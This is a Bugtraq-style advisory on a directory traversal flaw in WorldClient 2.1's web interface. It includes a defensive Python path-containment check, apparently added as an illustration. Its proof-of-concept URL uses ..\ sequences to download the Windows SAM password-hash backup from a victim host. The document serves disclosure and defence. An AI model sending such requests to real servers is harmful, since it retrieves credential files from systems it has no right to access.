Deerfield WorldClient 2.1 Directory Traversal Vulnerability
BID:1462
Info
| Bugtraq ID: | 1462 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jul 12 2000 12:00AM |
| Updated: | Jul 12 2000 12:00AM |
| Credit: | Discovered by and posted to Bugtraq on July 12, 2000 by Rikard Carlsson <[email protected]>. |
| Vulnerable: | Altn WorldClient Standard 2.1 |
| Not Vulnerable: | |
Discussion
The HTTP interface for WorldClient 2.1 is vulnerable to a directory traversal. By requesting a URL that combines the target filename with ..\ sequences, a remote user can retrieve and download any file whose location is known.
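The check whose absence this class of bug reflects, as an added example (not code from the advisory or from WorldClient): a request path is decoded once, backslashes are treated as separators, and the result is accepted only if it stays under the document root. DOC_ROOT and resolve_request_path are hypothetical names, and the sample request paths are constructed.

```python
import ntpath
from urllib.parse import unquote

# Hypothetical document root; the advisory does not give WorldClient's install path.
DOC_ROOT = r"C:\WorldClient\HTML"


def resolve_request_path(url_path, doc_root=DOC_ROOT):
    """Return the file path a request maps to, or None if it leaves doc_root.

    The check is lexical and uses Windows path rules (ntpath), so it behaves
    the same on any platform. A server should also resolve links on disk.
    """
    decoded = unquote(url_path)          # decode once, so %5C becomes "\"
    if "\x00" in decoded:
        return None
    # Windows accepts both separators, so "..\" climbs exactly like "../".
    relative = decoded.replace("/", "\\").lstrip("\\")
    if ntpath.splitdrive(relative)[0]:   # "C:..." would replace the root on join
        return None
    root = ntpath.normpath(doc_root)
    candidate = ntpath.normpath(ntpath.join(root, relative))
    # Compare whole path components, case-insensitively, not string prefixes.
    if ntpath.commonpath([root, candidate]).lower() != root.lower():
        return None
    return candidate


if __name__ == "__main__":
    # Constructed request paths; the second has the shape shown in the advisory.
    for path in ("/index.html", r"/..\..\..\winnt\repair\sam._",
                 "/..%5C..%5Cboot.ini", r"/images\..\index.html"):
        print(f"{path!r:40} -> {resolve_request_path(path)}")
```

A filter that only looks for "../" passes the backslash form, which is why the separator is normalised before the containment test.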
Exploit / POC
Example:
http://email.victim.com/..\..\..\winnt\repair\sam._
Solution / Fix
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].